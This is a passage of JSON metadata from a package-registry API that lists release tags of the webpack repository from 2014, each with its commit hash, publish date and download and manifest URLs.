itHub/repositories/webpack%2Fwebpack/tags/v1.4.6/manifests"},{"name":"v1.4.5","sha":"272d7219cdec5f041e98e2163078c6d2ea772bdf","kind":"commit","published_at":"2014-10-07T13:56:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.5/manifests"},{"name":"v1.4.4","sha":"2bcb6f9bca77d5d4a42efface7c1e274412b5b64","kind":"commit","published_at":"2014-09-26T06:54:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.4/manifests"},{"name":"v1.4.3","sha":"91c7426e4595f0d3c45efc9c1e17b40d875e6de2","kind":"commit","published_at":"2014-09-23T06:43:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.3/manifests"},{"name":"v1.4.2","sha":"c117ec46eaa149d3732157744467e58b2baf4517","kind":"commit","published_at":"2014-09-22T21:51:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.2/manifests"},{"name":"v1.4.1-beta1","sha":"c59727720e4bf1feb5a1939b69154ceec0111ed0","kind":"commit","published_at":"2014-09-19T06:13:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.1-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.1-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.1-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.1-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.1-beta1/manifests"},{"name":"v1.4.0-beta10","sha":"4afdc81bc4fa95fad705957f335ab48c6f7feb9a","kind":"commit","published_at":"2014-09-17T21:25:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta10/manifests"},{"name":"v1.4.0-beta9","sha":"4e79c9f245c3df0173cb75312cde5f1c51c902f6","kind":"commit","published_at":"2014-09-16T17:36:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta9/manifests"},{"name":"v1.4.0-beta8","sha":"bd02534a588b4ddc2893b5d222836f7c8df8447e","kind":"commit","published_at":"2014-09-15T11:33:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta8/manifests"},{"name":"v1.4.0-beta7","sha":"81748e167a80d79454f44564ca146179b9692e6d","kind":"commit","published_at":"2014-09-15T11:27:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta7/manifests"},{"name":"v1.4.0-beta6","sha":"2eed5961b0433ed22fd0a8d825f7ff15fd0dbeb1","kind":"commit","published_at":"2014-09-11T18:22:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta6/manifests"},{"name":"v1.4.0-beta5","sha":"911b62cfcb702a5971c67a6e2b4f100118bd26e2","kind":"commit","published_at":"2014-09-10T12:10:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta5/manifests"},{"name":"v1.4.0-beta4","sha":"89db931fb0ab82a6a46bb7afa4ae57126d555090","kind":"commit","published_at":"2014-09-07T20:55:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta4/manifests"},{"name":"v1.4.0-beta3","sha":"970e16d69b64df94b1d7f5dcf8e0f6c25cc2ff61","kind":"commit","published_at":"2014-09-03T12:16:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta3/manifests"},{"name":"v1.4.0-beta2","sha":"a912045bd428f3970762a49457e1d5d95316f3c5","kind":"commit","published_at":"2014-08-29T14:08:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta2/manifests"},{"name":"v1.4.0-beta1","sha":"b014b77d7f7de8d5b2f3d8aa0ca2bda1e948fc1d","kind":"commit","published_at":"2014-08-27T15:18:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta1/manifests"},{"name":"v1.3.7","sha":"b9a84f89d40e618357c17430eb61f76ccf48bef2","kind":"commit","published_at":"2014-08-25T14:34:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.7/manifests"},{"name":"v1.3.6","sha":"19b618133a121d2fad838e74b0879fa94dfeef3d","kind":"commit","published_at":"2014-08-25T11:38:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.6/manifests"},{"name":"v1.3.5","sha":"382635d711081fb6fedb75719e4c7f0e1e40f766","kind":"commit","published_at":"2014-08-25T08:45:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.5/manifests"},{"name":"v1.3.4","sha":"b9ac3fa3c77d64856503013a7262efd5b368a199","kind":"commit","published_at":"2014-08-25T08:20:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.4/manifests"},{"name":"v1.3.3-beta2","sha":"2a419ccbeab05d91a9f14fa6ac1e2037678d8f29","kind":"commit","published_at":"2014-08-14T09:34:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.3-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.3-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.3-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta2/manifests"},{"name":"v1.3.3-beta1","sha":"5a447ad7c39b63c037f56daf6df7d1df9074d1c8","kind":"commit","published_at":"2014-08-03T19:37:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.3-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.3-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.3-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta1/manifests"},{"name":"v1.3.2-beta9","sha":"a7d7c4ca2fb245d22fa98944d32acfff4746ac44","kind":"commit","published_at":"2014-07-28T22:15:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta9/manifests"},{"name":"v1.3.2-beta8","sha":"18ad6548134d5ff40fd04633e8e1375ddb005cc1","kind":"commit","published_at":"2014-07-26T15:54:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta8/manifests"},{"name":"v1.3.2-beta7","sha":"0dd1a69b97161df01a6bdd41d5f32bb4135af50a","kind":"commit","published_at":"2014-07-26T12:48:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta7/manifests"},{"name":"v1.3.2-beta6","sha":"7f6f44df1bb9ca055ac0eaed89aa0dca4e8dc6fa","kind":"commit","published_at":"2014-07-24T15:54:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta6/manifests"},{"name":"v1.3.2-beta5","sha":"cca21ee10756dbb8edb6fb283391f304a197295f","kind":"commit","published_at":"2014-07-24T13:08:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta5/manifests"},{"name":"v1.3.2-beta4","sha":"8d90c0f5b5998ebaf3e61ac443ec01a223d456e9","kind":"commit","published_at":"2014-07-23T12:42:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta4/manifests"},{"name":"v1.3.2-beta3","sha":"d76600101ccc5aef0be148909a336baf3d2ccfce","kind":"commit","published_at":"2014-07-19T12:35:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta3/manifests"},{"name":"v1.3.2-beta2","sha":"9d4cbb125445f4c2bb99c5b55a16c3255ae1d247","kind":"commit","published_at":"2014-07-18T11:32:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta2/manifests"},{"name":"v1.3.2-beta1","sha":"0ab5a3e993386b54afab416b5bc02747658469e6","kind":"commit","published_at":"2014-07-17T00:06:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta1/manifests"},{"name":"v1.3.1-beta9","sha":"53c38582e6ceb31aefab5237b042148dd6712151","kind":"commit","published_at":"2014-07-16T18:57:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta9/manifests"},{"name":"v1.3.1-beta8","sha":"6c50e7c3883ac24c4f3dcd7b8a11f9545c230589","kind":"commit","published_at":"2014-07-09T11:37:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta8/manifests"},{"name":"v1.3.1-beta7","sha":"287984cb54ed896c85778dc1874ec05195b99a11","kind":"commit","published_at":"2014-07-07T11:22:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta7/manifests"},{"name":"v1.3.1-beta6","sha":"5113a81dd9cdbf35cb104e50480b4c858105b795","kind":"commit","published_at":"2014-07-04T11:02:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta6/manifests"},{"name":"v1.3.1-beta5","sha":"197d2f2efa9e42836efe3f0f62c04c58b981a745","kind":"commit","published_at":"2014-07-02T22:00:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta5/manifests"},{"name":"v1.3.1-beta4","sha":"68cc2c6e03d1326bc0c69cab5b1faf7145e1e195","kind":"commit","published_at":"2014-06-23T22:46:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta4/manifests"},{"name":"v1.3.1-beta3","sha":"93beeacdf8e45970349006dc589c8e73b013e832","kind":"commit","published_at":"2014-06-18T21:03:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta3/manifests"},{"name":"v1.3.1-beta2","sha":"af55e54271c5961e6d1bf57b485f5a5463bb5a7f","kind":"commit","published_at":"2014-06-18T09:12:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta2/manifests"},{"name":"v1.3.1-beta1","sha":"8c2327e0b7863853a45ef094dbb8ded520e0314f","kind":"commit","published_at":"2014-06-17T20:46:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta1/manifests"},{"name":"v1.3.0-beta9","sha":"419eb4dfd9d7ed8ad16688874e33bbe57617e2d8","kind":"commit","published_at":"2014-06-17T20:40:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta9/manifests"},{"name":"v1.3.0-beta8","sha":"d3db09f72066ee23ec241f33ad6dfb00d42e8582","kind":"commit","published_at":"2014-06-12T04:31:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta8/manifests"},{"name":"v1.3.0-beta7","sha":"46a918f5682ec766bc21424311f16fe28bcd8892","kind":"commit","published_at":"2014-06-11T20:52:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta7/manifests"},{"name":"v1.3.0-beta6","sha":"20ad2baf9afd6a8d4e969e9ee094994c7b11905b","kind":"commit","published_at":"2014-06-11T20:26:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta6/manifests"},{"name":"v1.3.0-beta5","sha":"8bfb752c526ef612b2011c7bc266b7adb7a8fcb7","kind":"commit","published_at":"2014-06-05T17:54:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta5/manifests"},{"name":"v1.3.0-beta4","sha":"56e7073abbfec4b920bf1dffb0924027072d0c4e","kind":"commit","published_at":"2014-06-05T07:31:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta4","dependencies_parsed_